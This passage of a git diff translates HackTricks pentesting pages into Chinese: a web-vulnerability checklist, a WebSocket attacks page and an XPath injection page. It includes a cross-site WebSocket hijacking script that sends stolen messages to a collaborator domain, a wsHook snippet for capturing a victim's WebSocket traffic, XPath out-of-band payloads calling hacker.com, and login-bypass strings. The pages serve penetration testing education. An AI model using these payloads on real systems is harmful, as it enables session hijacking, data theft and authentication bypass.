+- [ ] [**服务器端XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
 
-### **External Identity Management**
+### **外部身份管理**
 
-- [ ] [**OAUTH to Account takeover**](oauth-to-account-takeover.md)
-- [ ] [**SAML Attacks**](saml-attacks/)
+- [ ] [**OAUTH到账户接管**](oauth-to-account-takeover.md)
+- [ ] [**SAML攻击**](saml-attacks/)
 
-### **Other Helpful Vulnerabilities**
+### **其他有用的漏洞**
 
-These vulnerabilities might help to exploit other vulnerabilities.
+这些漏洞可能有助于利用其他漏洞。
 
-- [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md)
+- [ ] [**域/子域接管**](domain-subdomain-takeover.md)
 - [ ] [**IDOR**](idor.md)
-- [ ] [**Parameter Pollution**](parameter-pollution.md)
-- [ ] [**Unicode Normalization vulnerability**](unicode-injection/)
+- [ ] [**参数污染**](parameter-pollution.md)
+- [ ] [**Unicode规范化漏洞**](unicode-injection/)
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度看待您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，查找允许您提升权限的安全问题，并使用自动化利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/web-vulnerabilities-methodology/README.md b/src/pentesting-web/web-vulnerabilities-methodology/README.md
index 4ffaa5c16..2b917a693 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology/README.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology/README.md
@@ -2,12 +2,12 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In every Web Pentest, there are **several hidden and obvious places that might be vulnerable**. This post is meant to be a checklist to confirm that you have searched for vulnerabilities in all the possible places.
+在每次 Web Pentest 中，有 **几个隐藏和明显的地方可能存在漏洞**。这篇文章旨在作为一个检查清单，以确认您已在所有可能的地方搜索漏洞。
 
 ## Proxies
 
 > [!NOTE]
-> Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be (ab)used to exploit vulnerabilities. These vulnerabilities need a vulnerable proxy to be in place, but they usually also need some extra vulnerability in the backend.
+> 现在的 **web** **应用程序** 通常 **使用** 某种 **中介** **代理**，这些代理可能被（滥）用来利用漏洞。这些漏洞需要一个脆弱的代理存在，但它们通常还需要后端的某些额外漏洞。
 
 - [ ] [**Abusing hop-by-hop headers**](../abusing-hop-by-hop-headers.md)
 - [ ] [**Cache Poisoning/Cache Deception**](../cache-deception.md)
@@ -21,12 +21,12 @@ In every Web Pentest, there are **several hidden and obvious places that might b
 ## **User input**
 
 > [!NOTE]
-> Most of the web applications will **allow users to input some data that will be processed later.**\
-> Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply.
+> 大多数 web 应用程序将 **允许用户输入一些数据以便后续处理。**\
+> 根据服务器期望的数据结构，某些漏洞可能适用或不适用。
 
 ### **Reflected Values**
 
-If the introduced data may somehow be reflected in the response, the page might be vulnerable to several issues.
+如果输入的数据可能以某种方式反映在响应中，则页面可能会受到多种问题的影响。
 
 - [ ] [**Client Side Template Injection**](../client-side-template-injection-csti.md)
 - [ ] [**Command Injection**](../command-injection.md)
@@ -44,7 +44,7 @@ If the introduced data may somehow be reflected in the response, the page might
 - [ ] [**XSSI**](../xssi-cross-site-script-inclusion.md)
 - [ ] [**XS-Search**](../xs-search.md)
 
-Some of the mentioned vulnerabilities require special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in:
+一些提到的漏洞需要特殊条件，其他的只需要内容被反映。您可以找到一些有趣的多语言工具来快速测试漏洞：
 
 {{#ref}}
 ../pocs-and-polygloths-cheatsheet/
@@ -52,7 +52,7 @@ Some of the mentioned vulnerabilities require special conditions, others just re
 
 ### **Search functionalities**
 
-If the functionality may be used to search some kind of data inside the backend, maybe you can (ab)use it to search arbitrary data.
+如果该功能可用于在后端搜索某种数据，您可能可以（滥）用它来搜索任意数据。
 
 - [ ] [**File Inclusion/Path Traversal**](../file-inclusion/)
 - [ ] [**NoSQL Injection**](../nosql-injection.md)
@@ -63,7 +63,7 @@ If the functionality may be used to search some kind of data inside the backend,
 
 ### **Forms, WebSockets and PostMsgs**
 
-When a websocket posts a message or a form allowing users to perform actions vulnerabilities may arise.
+当 WebSocket 发布消息或表单允许用户执行操作时，可能会出现漏洞。
 
 - [ ] [**Cross Site Request Forgery**](../csrf-cross-site-request-forgery.md)
 - [ ] [**Cross-site WebSocket hijacking (CSWSH)**](../websocket-attacks.md)
@@ -71,7 +71,7 @@ When a websocket posts a message or a form allowing users to perform actions vul
 
 ### **HTTP Headers**
 
-Depending on the HTTP headers given by the web server some vulnerabilities might be present.
+根据 Web 服务器提供的 HTTP 头，某些漏洞可能存在。
 
 - [ ] [**Clickjacking**](../clickjacking.md)
 - [ ] [**Content Security Policy bypass**](../content-security-policy-csp-bypass/)
@@ -80,7 +80,7 @@ Depending on the HTTP headers given by the web server some vulnerabilities might
 
 ### **Bypasses**
 
-There are several specific functionalities where some workarounds might be useful to bypass them
+有几个特定功能可能需要一些变通方法来绕过它们。
 
 - [ ] [**2FA/OTP Bypass**](../2fa-bypass.md)
 - [ ] [**Bypass Payment Process**](../bypass-payment-process.md)
@@ -93,8 +93,8 @@ There are several specific functionalities where some workarounds might be usefu
 
 ### **Structured objects / Specific functionalities**
 
-Some functionalities will require the **data to be structured in a very specific format** (like a language serialized object or XML). Therefore, it's easier to identify if the application might be vulnerable as it needs to be processing that kind of data.\
-Some **specific functionalities** may be also vulnerable if a **specific format of the input is used** (like Email Header Injections).
+某些功能将要求 **数据以非常特定的格式进行结构化**（如语言序列化对象或 XML）。因此，更容易识别应用程序是否可能存在漏洞，因为它需要处理这种类型的数据。\
+某些 **特定功能** 也可能存在漏洞，如果使用 **特定格式的输入**（如电子邮件头注入）。
 
 - [ ] [**Deserialization**](../deserialization/)
 - [ ] [**Email Header Injection**](../email-injections.md)
@@ -103,9 +103,9 @@ Some **specific functionalities** may be also vulnerable if a **specific format
 
 ### Files
 
-Functionalities that allow uploading files might be vulnerable to several issues.\
-Functionalities that generate files including user input might execute unexpected code.\
-Users that open files uploaded by users or automatically generated including user input might be compromised.
+允许上传文件的功能可能会面临多种问题。\
+生成包含用户输入的文件的功能可能会执行意外代码。\
+打开用户上传的文件或自动生成的包含用户输入的文件的用户可能会受到威胁。
 
 - [ ] [**File Upload**](../file-upload/)
 - [ ] [**Formula Injection**](../formula-csv-doc-latex-ghostscript-injection.md)
@@ -119,7 +119,7 @@ Users that open files uploaded by users or automatically generated including use
 
 ### **Other Helpful Vulnerabilities**
 
-These vulnerabilities might help to exploit other vulnerabilities.
+这些漏洞可能有助于利用其他漏洞。
 
 - [ ] [**Domain/Subdomain takeover**](../domain-subdomain-takeover.md)
 - [ ] [**IDOR**](../idor.md)
@@ -127,4 +127,3 @@ These vulnerabilities might help to exploit other vulnerabilities.
 - [ ] [**Unicode Normalization vulnerability**](../unicode-injection/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/websocket-attacks.md b/src/pentesting-web/websocket-attacks.md
index 1ea25a6cd..5b3a56216 100644
--- a/src/pentesting-web/websocket-attacks.md
+++ b/src/pentesting-web/websocket-attacks.md
@@ -1,25 +1,22 @@
-# WebSocket Attacks
+# WebSocket 攻击
 
 {{#include ../banners/hacktricks-training.md}}
 
-## What are WebSockets
+## 什么是 WebSocket
 
-WebSocket connections are established through an initial **HTTP** handshake and are designed to be **long-lived**, allowing for bidirectional messaging at any time without the need for a transactional system. This makes WebSockets particularly advantageous for applications requiring **low latency or server-initiated communication**, such as live financial data streams.
+WebSocket 连接通过初始的 **HTTP** 握手建立，旨在实现 **长时间** 存活，允许随时进行双向消息传递，而无需事务系统。这使得 WebSocket 特别适合需要 **低延迟或服务器发起通信** 的应用程序，例如实时金融数据流。
 
-### Establishment of WebSocket Connections
-
-A detailed explanation on establishing WebSocket connections can be accessed [**here**](https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc). In summary, WebSocket connections are usually initiated via client-side JavaScript as shown below:
+### WebSocket 连接的建立
 
+有关建立 WebSocket 连接的详细说明可以访问 [**这里**](https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc)。总之，WebSocket 连接通常通过客户端 JavaScript 发起，如下所示：
 ```javascript
 var ws = new WebSocket("wss://normal-website.com/ws")
 ```
+`wss` 协议表示一个使用 **TLS** 保护的 WebSocket 连接，而 `ws` 表示一个 **不安全** 的连接。
 
-The `wss` protocol signifies a WebSocket connection secured with **TLS**, whereas `ws` indicates an **unsecured** connection.
-
-During the connection establishment, a handshake is performed between the browser and server over HTTP. The handshake process involves the browser sending a request and the server responding, as illustrated in the following examples:
-
-Browser sends a handshake request:
+在连接建立期间，浏览器和服务器之间通过 HTTP 进行握手。握手过程涉及浏览器发送请求和服务器响应，如以下示例所示：
 
+浏览器发送握手请求：
 ```javascript
 GET /chat HTTP/1.1
 Host: normal-website.com
@@ -29,102 +26,90 @@ Connection: keep-alive, Upgrade
 Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
 Upgrade: websocket
 ```
-
-Server's handshake response:
-
+服务器的握手响应：
 ```javascript
 HTTP/1.1 101 Switching Protocols
 Connection: Upgrade
 Upgrade: websocket
 Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
 ```
+连接一旦建立，便可以在两个方向上进行消息交换。
 
-The connection remains open for message exchange in both directions once established.
+**WebSocket 握手的关键点：**
 
-**Key Points of the WebSocket Handshake:**
+- `Connection` 和 `Upgrade` 头部信号表示 WebSocket 握手的开始。
+- `Sec-WebSocket-Version` 头部指示所需的 WebSocket 协议版本，通常为 `13`。
+- 在 `Sec-WebSocket-Key` 头部中发送一个 Base64 编码的随机值，确保每个握手都是唯一的，这有助于防止缓存代理出现问题。该值不是用于身份验证，而是确认响应不是由配置错误的服务器或缓存生成的。
+- 服务器响应中的 `Sec-WebSocket-Accept` 头部是 `Sec-WebSocket-Key` 的哈希，验证服务器打开 WebSocket 连接的意图。
 
-- The `Connection` and `Upgrade` headers signal the initiation of a WebSocket handshake.
-- The `Sec-WebSocket-Version` header indicates the desired WebSocket protocol version, usually `13`.
-- A Base64-encoded random value is sent in the `Sec-WebSocket-Key` header, ensuring each handshake is unique, which helps to prevent issues with caching proxies. This value is not for authentication but to confirm that the response is not generated by a misconfigured server or cache.
-- The `Sec-WebSocket-Accept` header in the server's response is a hash of the `Sec-WebSocket-Key`, verifying the server's intention to open a WebSocket connection.
+这些特性确保握手过程安全可靠，为高效的实时通信铺平道路。
 
-These features ensure the handshake process is secure and reliable, paving the way for efficient real-time communication.
-
-### Linux console
-
-You can use `websocat` to establish a raw connection with a websocket.
+### Linux 控制台
 
+您可以使用 `websocat` 与 websocket 建立原始连接。
 ```bash
 websocat --insecure wss://10.10.10.10:8000 -v
 ```
-
-Or to create a websocat server:
-
+或创建一个 websocat 服务器：
 ```bash
 websocat -s 0.0.0.0:8000 #Listen in port 8000
 ```
+### MitM websocket 连接
 
-### MitM websocket connections
-
-If you find that clients are connected to a **HTTP websocket** from your current local network you could try an [ARP Spoofing Attack ](../generic-methodologies-and-resources/pentesting-network/#arp-spoofing)to perform a MitM attack between the client and the server.\
-Once the client is trying to connect to you can then use:
-
+如果你发现客户端从你当前的本地网络连接到一个 **HTTP websocket**，你可以尝试进行一个 [ARP Spoofing Attack ](../generic-methodologies-and-resources/pentesting-network/#arp-spoofing)来在客户端和服务器之间执行 MitM 攻击。\
+一旦客户端尝试连接，你可以使用：
 ```bash
 websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
 ```
-
 ### Websockets enumeration
 
-You can use the **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **to discover, fingerprint and search for known** **vulnerabilities** in websockets automatically.
+您可以使用 **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **自动发现、指纹识别和搜索已知的** **vulnerabilities** **在 websockets 中。**
 
 ### Websocket Debug tools
 
-- **Burp Suite** supports MitM websockets communication in a very similar way it does it for regular HTTP communication.
-  - The [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** will allow you to manage better Websocket communications in Burp by getting the **history**, setting **interception rules**, using **match and replace** rules, using **Intruder** and **AutoRepeater.**
-- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Short for "**WebSocket/Socket.io Proxy**", this tool, written in Node.js, provides a user interface to **capture, intercept, send custom** messages and view all WebSocket and Socket.IO communications between the client and server.
-- [**wsrepl**](https://github.com/doyensec/wsrepl) is an **interactive websocket REPL** designed specifically for penetration testing. It provides an interface for observing **incoming websocket messages and sending new ones**, with an easy-to-use framework for **automating** this communication.&#x20;
-- [**https://websocketking.com/**](https://websocketking.com/) it's a **web to communicate** with other webs using **websockets**.
-- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) among other types of communications/protocols, it provides a **web to communicate** with other webs using **websockets.**
+- **Burp Suite** 以与常规 HTTP 通信非常相似的方式支持 MitM websockets 通信。
+- [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite 扩展** 将允许您通过获取 **history**、设置 **interception rules**、使用 **match and replace** 规则、使用 **Intruder** 和 **AutoRepeater** 更好地管理 Burp 中的 Websocket 通信。
+- [**WSSiP**](https://github.com/nccgroup/wssip)**:** 代表 "**WebSocket/Socket.io Proxy**"，这个用 Node.js 编写的工具提供了一个用户界面来 **capture、intercept、send custom** 消息并查看客户端和服务器之间的所有 WebSocket 和 Socket.IO 通信。
+- [**wsrepl**](https://github.com/doyensec/wsrepl) 是一个专门为渗透测试设计的 **interactive websocket REPL**。它提供了一个界面来观察 **incoming websocket messages 和发送新消息**，并提供一个易于使用的框架来 **automating** 这种通信。&#x20;
+- [**https://websocketking.com/**](https://websocketking.com/) 是一个 **web to communicate** 使用 **websockets** 与其他网站进行通信。
+- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) 在其他类型的通信/协议中，它提供了一个 **web to communicate** 使用 **websockets** 与其他网站进行通信。
 
 ## Websocket Lab
 
-In [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) you have a code to launch a web using websockets and in [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) you can find an explanation.
+在 [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) 中，您有一个代码来启动一个使用 websockets 的网页，在 [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) 中可以找到解释。
 
 ## Cross-site WebSocket hijacking (CSWSH)
 
-**Cross-site WebSocket hijacking**, also known as **cross-origin WebSocket hijacking**, is identified as a specific case of **[Cross-Site Request Forgery (CSRF)](csrf-cross-site-request-forgery.md)** affecting WebSocket handshakes. This vulnerability arises when WebSocket handshakes authenticate solely via **HTTP cookies** without **CSRF tokens** or similar security measures.
+**Cross-site WebSocket hijacking**，也称为 **cross-origin WebSocket hijacking**，被识别为影响 WebSocket 握手的 **[Cross-Site Request Forgery (CSRF)](csrf-cross-site-request-forgery.md)** 的特定案例。当 WebSocket 握手仅通过 **HTTP cookies** 进行身份验证，而没有 **CSRF tokens** 或类似的安全措施时，就会出现此漏洞。
 
-Attackers can exploit this by hosting a **malicious web page** that initiates a cross-site WebSocket connection to a vulnerable application. Consequently, this connection is treated as part of the victim's session with the application, exploiting the lack of CSRF protection in the session handling mechanism.
+攻击者可以通过托管一个 **malicious web page** 来利用这一点，该页面发起与易受攻击应用程序的跨站点 WebSocket 连接。因此，这个连接被视为受害者与应用程序的会话的一部分，利用会话处理机制中缺乏 CSRF 保护。
 
 ### Simple Attack
 
-Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**.
-
-Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.:
+请注意，当 **establishing** 一个 **websocket** 连接时，**cookie** 会被 **sent** 到服务器。**server** 可能会使用它来 **relate** 每个 **specific** **user** 与其基于发送的 cookie 的 **websocket** **session**。
 
+然后，如果 **例如** **websocket** **server** **发送回用户的对话历史**，如果发送了一个带有 "**READY"** 的消息，那么一个 **simple XSS** 建立连接（**cookie** 将 **automatically** 被 **sent** 以授权受害者用户） **sending** "**READY**" 将能够 **retrieve** 对话的 **history**。
 ```markup
 <script>
 websocket = new WebSocket('wss://your-websocket-URL')
 websocket.onopen = start
 websocket.onmessage = handleReply
 function start(event) {
-  websocket.send("READY"); //Send the message to retreive confidential information
+websocket.send("READY"); //Send the message to retreive confidential information
 }
 function handleReply(event) {
-  //Exfiltrate the confidential information to attackers server
-  fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
+//Exfiltrate the confidential information to attackers server
+fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
 }
 </script>
 ```
+### 跨源 + 不同子域的 Cookie
 
-### Cross Origin + Cookie with a different subdomain
+在这篇博客文章 [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) 中，攻击者成功地在进行 Websocket 通信的域的 **子域** 中 **执行了任意 Javascript**。因为这是一个 **子域**，所以 **cookie** 被 **发送**，而且因为 **Websocket 没有正确检查 Origin**，因此可以与其通信并 **窃取其中的令牌**。
 
-In this blog post [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) the attacker managed to **execute arbitrary Javascript in a subdomain** of the domain where the web socket communication was occurring. Because it was a **subdomain**, the **cookie** was being **sent**, and because the **Websocket didn't check the Origin properly**, it was possible to communicate with it and **steal tokens from it**.
-
-### Stealing data from user
-
-Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code:
+### 从用户那里窃取数据
 
+复制您想要冒充的 Web 应用程序（例如 .html 文件），并在 Websocket 通信发生的脚本中添加以下代码：
 ```javascript
 //This is the script tag to load the websocket hooker
 ;<script src="wsHook.js"></script>
@@ -133,44 +118,40 @@ Copy the web application you want to impersonate (the .html files for example) a
 //is sent by the client or received from the server
 //These code must be between some <script> tags or inside a .js file
 wsHook.before = function (data, url) {
-  var xhttp = new XMLHttpRequest()
-  xhttp.open("GET", "client_msg?m=" + data, true)
-  xhttp.send()
+var xhttp = new XMLHttpRequest()
+xhttp.open("GET", "client_msg?m=" + data, true)
+xhttp.send()
 }
 wsHook.after = function (messageEvent, url, wsObject) {
-  var xhttp = new XMLHttpRequest()
-  xhttp.open("GET", "server_msg?m=" + messageEvent.data, true)
-  xhttp.send()
-  return messageEvent
+var xhttp = new XMLHttpRequest()
+xhttp.open("GET", "server_msg?m=" + messageEvent.data, true)
+xhttp.send()
+return messageEvent
 }
 ```
-
-Now download the `wsHook.js` file from [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) and **save it inside the folder with the web files**.\
-Exposing the web application and making a user connect to it you will be able to steal the sent and received messages via websocket:
-
+现在从 [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) 下载 `wsHook.js` 文件，并**将其保存在包含网页文件的文件夹中**。\
+通过暴露网络应用程序并使用户连接到它，您将能够窃取通过 websocket 发送和接收的消息：
 ```javascript
 sudo python3 -m http.server 80
 ```
+## 竞争条件
 
-## Race Conditions
+WebSockets 中的竞争条件也是一个问题，[查看此信息以了解更多](race-condition.md#rc-in-websockets)。
 
-Race Conditions in WebSockets are also a thing, [check this information to learn more](race-condition.md#rc-in-websockets).
+## 其他漏洞
 
-## Other vulnerabilities
+由于 Web Sockets 是一种 **向服务器端和客户端发送数据** 的机制，具体取决于服务器和客户端如何处理信息，**Web Sockets 可以被用来利用其他几种漏洞，如 XSS、SQLi 或任何其他常见的网络漏洞，使用来自 websocket 的用户输入。**
 
-As Web Sockets are a mechanism to **send data to server side and client side**, depending on how the server and client handles the information, **Web Sockets can be used to exploit several other vulnerabilities like XSS, SQLi or any other common web vuln using input of s user from a websocket.**
+## **WebSocket 走私**
 
-## **WebSocket Smuggling**
-
-This vulnerability could allow you to **bypass reverse proxies restrictions** by making them believe that a **websocket communication was stablished** (even if it isn't true). This could allow an attacker to **access hidden endpoints**. For more information check the following page:
+此漏洞可能允许您 **绕过反向代理限制**，使其相信 **websocket 通信已建立**（即使这不是真的）。这可能允许攻击者 **访问隐藏的端点**。有关更多信息，请查看以下页面：
 
 {{#ref}}
 h2c-smuggling.md
 {{#endref}}
 
-## References
+## 参考
 
 - [https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages](https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xpath-injection.md b/src/pentesting-web/xpath-injection.md
index fdc619aad..e667a43e5 100644
--- a/src/pentesting-web/xpath-injection.md
+++ b/src/pentesting-web/xpath-injection.md
@@ -1,100 +1,97 @@
-# XPATH injection
+# XPATH 注入
 
 {{#include ../banners/hacktricks-training.md}}
 
 <figure><img src="../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客洞察**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+了解最新的漏洞赏金计划和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶级黑客合作吧！
 
-## Basic Syntax
+## 基本语法
 
-An attack technique known as XPath Injection is utilized to take advantage of applications that form XPath (XML Path Language) queries based on user input to query or navigate XML documents.
+一种称为 XPath 注入 的攻击技术被用来利用基于用户输入形成 XPath（XML 路径语言）查询的应用程序，以查询或导航 XML 文档。
 
-### Nodes Described
+### 节点描述
 
-Expressions are used to select various nodes in an XML document. These expressions and their descriptions are summarized below:
+表达式用于选择 XML 文档中的各种节点。以下是这些表达式及其描述的总结：
 
-- **nodename**: All nodes with the name "nodename" are selected.
-- **/**: Selection is made from the root node.
-- **//**: Nodes matching the selection from the current node are selected, regardless of their location in the document.
-- **.**: The current node is selected.
-- **..**: The parent of the current node is selected.
-- **@**: Attributes are selected.
+- **nodename**: 选择所有名为 "nodename" 的节点。
+- **/**: 从根节点进行选择。
+- **//**: 选择与当前节点匹配的节点，无论它们在文档中的位置如何。
+- **.**: 选择当前节点。
+- **..**: 选择当前节点的父节点。
+- **@**: 选择属性。
 
-### XPath Examples
+### XPath 示例
 
-Examples of path expressions and their results include:
+路径表达式及其结果的示例包括：
 
-- **bookstore**: All nodes named "bookstore" are selected.
-- **/bookstore**: The root element bookstore is selected. It's noted that an absolute path to an element is represented by a path starting with a slash (/).
-- **bookstore/book**: All book elements that are children of bookstore are selected.
-- **//book**: All book elements in the document are selected, irrespective of their location.
-- **bookstore//book**: All book elements that are descendants of the bookstore element are selected, no matter their position under the bookstore element.
-- **//@lang**: All attributes named lang are selected.
+- **bookstore**: 选择所有名为 "bookstore" 的节点。
+- **/bookstore**: 选择根元素 bookstore。注意，以斜杠（/）开头的路径表示对元素的绝对路径。
+- **bookstore/book**: 选择所有 bookstore 的子元素 book。
+- **//book**: 选择文档中的所有 book 元素，无论它们的位置。
+- **bookstore//book**: 选择 bookstore 元素的所有后代 book 元素，无论它们在 bookstore 元素下的位置。
+- **//@lang**: 选择所有名为 lang 的属性。
 
-### Utilization of Predicates
+### 谓词的使用
 
-Predicates are used to refine selections:
+谓词用于细化选择：
 
-- **/bookstore/book\[1]**: The first book element child of the bookstore element is selected. A workaround for IE versions 5 to 9, which index the first node as \[0], is setting the SelectionLanguage to XPath through JavaScript.
-- **/bookstore/book\[last()]**: The last book element child of the bookstore element is selected.
-- **/bookstore/book\[last()-1]**: The penultimate book element child of the bookstore element is selected.
-- **/bookstore/book\[position()<3]**: The first two book elements children of the bookstore element are selected.
-- **//title\[@lang]**: All title elements with a lang attribute are selected.
-- **//title\[@lang='en']**: All title elements with a "lang" attribute value of "en" are selected.
-- **/bookstore/book\[price>35.00]**: All book elements of the bookstore with a price greater than 35.00 are selected.
-- **/bookstore/book\[price>35.00]/title**: All title elements of the book elements of the bookstore with a price greater than 35.00 are selected.
+- **/bookstore/book\[1]**: 选择 bookstore 元素的第一个子元素 book。对于 IE 版本 5 到 9，索引第一个节点为 \[0] 的解决方法是通过 JavaScript 将 SelectionLanguage 设置为 XPath。
+- **/bookstore/book\[last()]**: 选择 bookstore 元素的最后一个子元素 book。
+- **/bookstore/book\[last()-1]**: 选择 bookstore 元素的倒数第二个子元素 book。
+- **/bookstore/book\[position()<3]**: 选择 bookstore 元素的前两个子元素 book。
+- **//title\[@lang]**: 选择所有具有 lang 属性的 title 元素。
+- **//title\[@lang='en']**: 选择所有 lang 属性值为 "en" 的 title 元素。
+- **/bookstore/book\[price>35.00]**: 选择价格大于 35.00 的 bookstore 的所有 book 元素。
+- **/bookstore/book\[price>35.00]/title**: 选择价格大于 35.00 的 bookstore 的所有 book 元素的 title 元素。
 
-### Handling of Unknown Nodes
+### 处理未知节点
 
-Wildcards are employed for matching unknown nodes:
+通配符用于匹配未知节点：
 
-- **\***: Matches any element node.
-- **@**\*: Matches any attribute node.
-- **node()**: Matches any node of any kind.
+- **\***: 匹配任何元素节点。
+- **@**\*: 匹配任何属性节点。
+- **node()**: 匹配任何类型的节点。
 
-Further examples include:
+进一步的示例包括：
 
-- **/bookstore/\***: Selects all the child element nodes of the bookstore element.
-- **//\***: Selects all elements in the document.
-- **//title\[@\*]**: Selects all title elements with at least one attribute of any kind.
-
-## Example
+- **/bookstore/\***: 选择 bookstore 元素的所有子元素节点。
+- **//\***: 选择文档中的所有元素。
+- **//title\[@\*]**: 选择所有至少具有一个任意类型属性的 title 元素。
 
+## 示例
 ```xml
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <data>
 <user>
-    <name>pepe</name>
-    <password>peponcio</password>
-    <account>admin</account>
+<name>pepe</name>
+<password>peponcio</password>
+<account>admin</account>
 </user>
 <user>
-    <name>mark</name>
-    <password>m12345</password>
-    <account>regular</account>
+<name>mark</name>
+<password>m12345</password>
+<account>regular</account>
 </user>
 <user>
-    <name>fino</name>
-    <password>fino2</password>
-    <account>regular</account>
+<name>fino</name>
+<password>fino2</password>
+<account>regular</account>
 </user>
 </data>
 ```
-
-### Access the information
-
+### 访问信息
 ```
 All names - [pepe, mark, fino]
 name
@@ -121,9 +118,7 @@ count(//user/node()) #3*3 = 9 (count all values)
 string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
 substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
 ```
-
-### Identify & stealing the schema
-
+### 识别与窃取模式
 ```python
 and count(/*) = 1 #root
 and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
@@ -138,16 +133,16 @@ and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0
 #The previous solutions are the representation of a schema like the following
 #(at this stage we don't know the name of the tags, but jus the schema)
 <root>
-    <a>
-        <b></b>
-    </a>
-    <c>
-        <d></d>
-        <e></e>
-        <f>
-            <h></h>
-        </f>
-    </c>
+<a>
+<b></b>
+</a>
+<c>
+<d></d>
+<e></e>
+<f>
+<h></h>
+</f>
+</c>
 </root>
 
 and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
@@ -158,18 +153,14 @@ and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of
 doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
 doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
 ```
+## 认证绕过
 
-## Authentication Bypass
-
-### **Example of queries:**
-
+### **查询示例：**
 ```
 string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
 $q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
 ```
-
-### **OR bypass in user and password (same value in both)**
-
+### **OR 绕过用户和密码（两者值相同）**
 ```
 ' or '1'='1
 " or "1"="1
@@ -180,17 +171,13 @@ string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/accou
 Select account
 Select the account using the username and use one of the previous values in the password field
 ```
-
-### **Abusing null injection**
